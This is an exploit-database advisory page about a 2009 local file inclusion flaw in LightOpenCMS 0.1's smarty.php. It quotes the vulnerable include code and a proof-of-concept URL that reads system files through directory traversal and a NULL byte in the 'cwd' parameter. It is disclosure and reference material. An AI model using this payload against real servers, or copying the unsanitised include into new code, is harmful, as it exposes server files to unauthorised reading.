header-logo
Suggest Exploit
vendor:
LightOpenCMS
by:
Jose Luis Gongora Fernandez (a.k.a) JosS
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: LightOpenCMS
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:lightopencms:lightopencms:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability

LightOpenCMS 0.1 is vulnerable to a local file inclusion vulnerability due to a lack of sanitization of user-supplied input. The vulnerability exists in the 'smarty.php' script, which is used to include the Smarty library. The script uses the 'cwd' parameter to define the path to the Smarty library, which is not properly sanitized before being used. This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded NULL bytes. Successful exploitation requires that 'register_globals' is set to 'On' in the 'php.ini' configuration file.

Mitigation:

User input should be properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://sourceforge.net/project/showfiles.php?group_id=251474

[smarty.php]
 define("SMARTY_DIR", $cwd."/smarty/");
 require_once(SMARTY_DIR."/Smarty.class.php");

PoC:
 [php.ini] register_globals= On
 http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00

Greetz: YEnH4ckEr, str0ke and spanish hackers!

# milw0rm.com [2009-06-24]